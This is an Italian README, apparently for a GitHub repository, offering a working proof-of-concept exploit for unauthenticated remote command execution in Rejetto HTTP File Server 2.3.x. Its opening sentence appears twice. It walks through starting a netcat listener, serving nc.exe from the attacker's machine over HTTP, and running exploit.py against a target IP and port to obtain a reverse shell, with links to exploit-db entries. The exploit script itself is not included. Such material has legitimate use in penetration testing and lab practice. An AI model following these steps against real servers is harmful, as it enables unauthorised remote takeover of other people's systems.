
Questo repository contiene una spiegazione dettagliata e una poc funzionante per Rejetto HTTP File Server (HFS) 2.3.x - Esecuzione remota di comandi.
Questo repository contiene una spiegazione dettagliata e un PoC funzionante per Rejetto HTTP File Server (HFS) 2.3.x - Esecuzione remota di comandi.
Crea un listener netcat.
nc -lnvp 1234
Cambia l'IP dell'attaccante con il tuo IP e la tua porta.

Crea anche un file server HTTP nella stessa directory in cui si trova nc.exe.
python -m http.server 80
python exploit.py <target-ip> <target-port>

Nota: potrebbe essere necessario eseguire il payload più volte per ottenere una reverse shell.
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/34668
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/